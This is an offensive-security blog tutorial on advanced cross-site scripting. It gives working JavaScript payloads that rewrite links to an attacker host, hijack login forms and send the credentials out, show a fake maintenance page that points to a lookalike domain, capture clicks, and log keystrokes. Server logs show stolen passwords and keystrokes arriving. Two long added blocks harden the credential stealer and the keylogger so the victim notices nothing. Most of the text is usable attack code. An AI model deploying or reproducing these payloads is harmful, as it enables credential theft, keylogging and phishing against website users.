Advanced XSS

2 minute read

Advanced XSS builds upon my previous post, Basic XSS.

Modifying HTML


  • Changing the main heading of the target page (the first h1 element, not the document title) to New Title.
<script> 
document.getElementsByTagName("h1")[0].innerHTML = "New Title";
</script>



  • Changing all links on the target page to point to our attacking host, serving up the malicious file evil.txt.
<script> 
// Collect every anchor on the page and point each one at our host.
var links = document.getElementsByTagName("a");
for (var i = 0; i < links.length; i++)
{
    links[i].href = "http://AttackerIP/evil.txt";
}
</script>


Form Submission Hijacking


  • For the username and password variables we select the first form on the page, indicated by forms[0].

  • We then select the first and second controls of that form, where elements[0] represents the username input field and elements[1] the password input field. Selecting by position is fragile: a hidden CSRF token or a "remember me" box placed before the inputs shifts the indices, so check the real form layout first.

  • The data entered into these fields is then assigned to the respective variables.

  • Once the victim submits the form our function InterceptForm is called, because we registered it as the submit handler: document.forms[0].onsubmit = InterceptForm;. The handler returns nothing, so the submission proceeds as normal and the victim sees an ordinary login.

  • We then send ourselves the captured credentials by setting Image().src to a URL on our own HTTP server. The browser issues a GET request for the "image" with the credentials in the query string; no image needs to exist, and the request goes out even though the page is about to navigate.

<script>
function InterceptForm()
{
    // elements[0] and elements[1] are assumed to be the username and password inputs
    var username = document.forms[0].elements[0].value; 
    var password = document.forms[0].elements[1].value;   
    // the image request carries the credentials to our server; the form still submits normally
    new Image().src = "http://AttackerIP/?username="+username+"&password="+password;
}
document.forms[0].onsubmit = InterceptForm;
</script>
root@kali:~# python -m SimpleHTTPServer 80  
// Receive the credentials from our JavaScript payload 
... "GET /?username=victim&password=Sup3rSecP@ssw0rd HTTP/1.1" 200 -
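A sturdier version of the capture, added here as an example rather than taken from the original post. Instead of trusting elements[0] and elements[1], it locates the password field by its type and takes the nearest text-like field before it as the username, serialises every named control (hidden CSRF tokens included), URL-encodes the values so characters such as &, # or @ cannot break the query, and preserves any submit handler the page already had. AttackerIP, the field names and the fixture form are assumptions; in a browser the install line is hookForm(document.forms[0]).

```javascript
// Added example, not code from the original post.
// AttackerIP is a placeholder for a host under the attacker's control (assumption).
var EXFIL_BASE = "http://AttackerIP/";

// Serialise the named controls of a form-like object into {name: value}.
// `form` only needs an `elements` list of {name, type, value} objects, so this
// works on a real HTMLFormElement and on the constructed fixture below.
function collectFields(form) {
  var out = {};
  for (var i = 0; i < form.elements.length; i++) {
    var el = form.elements[i];
    if (!el.name) continue;                                   // unnamed buttons etc.
    if (el.type === "submit" || el.type === "button") continue;
    out[el.name] = el.value;
  }
  return out;
}

// Find the credential inputs by type rather than by position: the first
// password field, and the nearest text/email/tel field typed before it.
function findCredentialFields(form) {
  var els = form.elements;
  for (var i = 0; i < els.length; i++) {
    if (els[i].type !== "password") continue;
    for (var j = i - 1; j >= 0; j--) {
      var t = els[j].type;
      if (t === "text" || t === "email" || t === "tel") {
        return { username: els[j], password: els[i] };
      }
    }
    return { username: null, password: els[i] };
  }
  return null;                                                // no password field on this form
}

// Build the exfiltration URL with every value percent-encoded.
function buildExfilUrl(base, fields) {
  var parts = [];
  for (var k in fields) {
    if (Object.prototype.hasOwnProperty.call(fields, k)) {
      parts.push(encodeURIComponent(k) + "=" + encodeURIComponent(fields[k]));
    }
  }
  return base + "?" + parts.join("&");
}

// Send the form contents as a fire-and-forget image request; returns the URL
// so the behaviour can be checked outside a browser, where Image is undefined.
function interceptForm(form) {
  var url = buildExfilUrl(EXFIL_BASE, collectFields(form));
  if (typeof Image !== "undefined") new Image().src = url;
  return url;
}

// Install the hook while keeping the page's own onsubmit handler, so the
// login keeps working and nothing visibly changes for the victim.
function hookForm(form) {
  var previous = form.onsubmit;
  form.onsubmit = function (ev) {
    interceptForm(form);
    return previous ? previous.call(form, ev) : true;
  };
}

// Constructed fixture (not a real page) so the block runs stand-alone.
var fixtureForm = {
  onsubmit: null,
  elements: [
    { name: "csrf",  type: "hidden",   value: "abc123" },
    { name: "email", type: "email",    value: "victim@example.com" },
    { name: "pass",  type: "password", value: "Sup3r&Sec#P@ss" },
    { name: "login", type: "submit",   value: "Sign in" }
  ]
};
// Browser install: hookForm(document.forms[0]);
```

With this payload the server log shows one request per submission, e.g. GET /?csrf=abc123&email=victim%40example.com&pass=Sup3r%26Sec%23P%40ss, which can be decoded with any URL-decoding tool. A Content-Security-Policy with a restrictive img-src and no 'unsafe-inline' for scripts would block both the inline payload and the image beacon, which is the check a defender should make on the target.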


Social Engineering


  • First we create an h2 element and set its text to our new heading, Website Under Construction.

  • Secondly, we create an h3 element and set its text to our malicious redirect message, Please visit SuperSecureCompany.com.

  • Upon clicking, the link will send the victim to a domain or malicious file under our control.

  • We want our malicious domain to resemble the target domain as closely as possible, so that the victim believes the site is genuinely down and follows our link.

  • Lastly we append our h2 and h3 elements to the page and remove the login form that was there originally.

<script>
// fake "down for maintenance" heading
var input = document.createElement("h2");
input.innerHTML = "Website Under Construction";

// String.prototype.link() wraps the text in an <a href="..."> element
var link = document.createElement("h3");
link.innerHTML = "Please visit" + " SuperSecureCompany.com".link('http://SuperSecComp.com/evil.txt');

// insert our elements beside the login form, then remove the form itself
document.forms[0].parentNode.appendChild(input);
document.forms[0].parentNode.appendChild(link);
document.forms[0].parentNode.removeChild(document.forms[0]);
</script>


Before injection:


After injection:


Capturing Clicks


  • We declare a function CaughtClick that navigates to our malicious URL.

  • We then add an EventListener for click events to the document body. The third argument, true, registers it for the capture phase, so it runs before any click handler the page itself has attached.

  • If the victim clicks anywhere on the page whilst browsing the target site, the event listener will 'catch' the click and run our CaughtClick function, sending the victim to a site under our control. Because the redirect replaces the page, only the first click is needed.

  • For more information on JavaScript events, please click here.

<script>
function CaughtClick()
{
    // navigate the current tab to our host
    location.href = "http://AttackerIP/evil.txt";
}
// capture phase (true): fires before the page's own click handlers
document.body.addEventListener('click', CaughtClick, true);
</script>


Keylogging


  • We assign our function KeyLog as the document's onkeypress event handler.

  • The browser passes the keypress event to KeyLog as its input argument.

  • The key_pressed variable is set to the character whose Unicode code (input.which) corresponds to the key the victim pressed.

  • Finally, we send each value of key_pressed to our Python SimpleHTTPServer using Image().src. This issues one request per keystroke and does not encode the character, so a space arrives as a bare space in the request line (visible in the log below) and characters such as & or # would corrupt the query. Note also that onkeypress fires only for printable keys, so Backspace and Enter are not recorded.

<script>
document.onkeypress = function KeyLog(input)
{
    // input.which holds the character code of the key pressed
    var key_pressed = String.fromCharCode(input.which);
    // one image request per keystroke, character sent unencoded
    new Image().src = "http://AttackerIP/?"+key_pressed;
}
</script>
root@kali:~# python -m SimpleHTTPServer 80  
// Receive the keystrokes from our JavaScript payload 
... "GET /?v HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?c HTTP/1.1" 200 -
... "GET /?t HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?m HTTP/1.1" 200 -
... "GET /?  HTTP/1.1" 200 -
... "GET /?P HTTP/1.1" 200 -
... "GET /?a HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?w HTTP/1.1" 200 -
... "GET /?o HTTP/1.1" 200 -
... "GET /?r HTTP/1.1" 200 -
... "GET /?d HTTP/1.1" 200 -
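A batching keylogger, added here as an example and not part of the original post. It addresses the two weaknesses of the payload above: it buffers keystrokes and flushes them in a single percent-encoded request instead of one request per key, and it records which field each key was typed into, using event.key (which also names non-printing keys such as Tab and Backspace) with a fallback to event.which for older browsers. AttackerIP, the field names and the sample events are assumptions; in a browser it is installed with the three commented lines in the block.

```javascript
// Added example, not code from the original post.
// AttackerIP is a placeholder for an attacker-controlled host (assumption).
var KEYLOG_BASE = "http://AttackerIP/";

function createKeyLogger(base) {
  var buffer = [];                                      // {field, key} in the order typed

  // Turn a KeyboardEvent-like object into a printable token. Printable keys
  // are kept as-is; named keys become "<Enter>", "<Backspace>" and so on.
  // Events that only carry `which` (legacy keypress) fall back to the char code.
  function tokenFor(ev) {
    if (typeof ev.key === "string") {
      return ev.key.length === 1 ? ev.key : "<" + ev.key + ">";
    }
    return String.fromCharCode(ev.which || ev.keyCode);
  }

  // Name of the input the key was typed into, or "" when unknown.
  function fieldNameOf(ev) {
    var t = ev.target;
    return t && (t.name || t.id) ? (t.name || t.id) : "";
  }

  // Render the buffer as "[field]keys[field]keys", marking field changes.
  function pending() {
    var s = "", last = null;
    for (var i = 0; i < buffer.length; i++) {
      if (buffer[i].field !== last) {
        s += "[" + buffer[i].field + "]";
        last = buffer[i].field;
      }
      s += buffer[i].key;
    }
    return s;
  }

  // Send everything captured so far in one encoded request and empty the
  // buffer. Returns null when idle so a timer can call it without sending
  // empty beacons; returns the URL so the result can be checked outside a browser.
  function flush() {
    if (buffer.length === 0) return null;
    var url = base + "?k=" + encodeURIComponent(pending());
    buffer = [];
    if (typeof Image !== "undefined") new Image().src = url;
    return url;
  }

  return {
    handleKeyEvent: function (ev) { buffer.push({ field: fieldNameOf(ev), key: tokenFor(ev) }); },
    pending: pending,
    flush: flush
  };
}

// Browser install (not executed here):
//   var logger = createKeyLogger(KEYLOG_BASE);
//   document.addEventListener("keydown", logger.handleKeyEvent, true);
//   setInterval(logger.flush, 3000);

// Constructed sample events: the victim types "vic tim" into the username
// field, presses Tab, then types "P@ss" into the password field.
function sampleEvents() {
  var evs = [];
  "vic tim".split("").forEach(function (c) { evs.push({ key: c, target: { name: "username" } }); });
  evs.push({ key: "Tab", target: { name: "username" } });
  "P@ss".split("").forEach(function (c) { evs.push({ key: c, target: { name: "password" } }); });
  return evs;
}
```

Running the sample events through the logger and flushing once produces a single request, GET /?k=%5Busername%5Dvic%20tim%3CTab%3E%5Bpassword%5DP%40ss, in place of the eleven separate lines the original payload generates; the space and the field boundary survive the trip, and a keydown listener (unlike onkeypress) also sees Backspace and Enter.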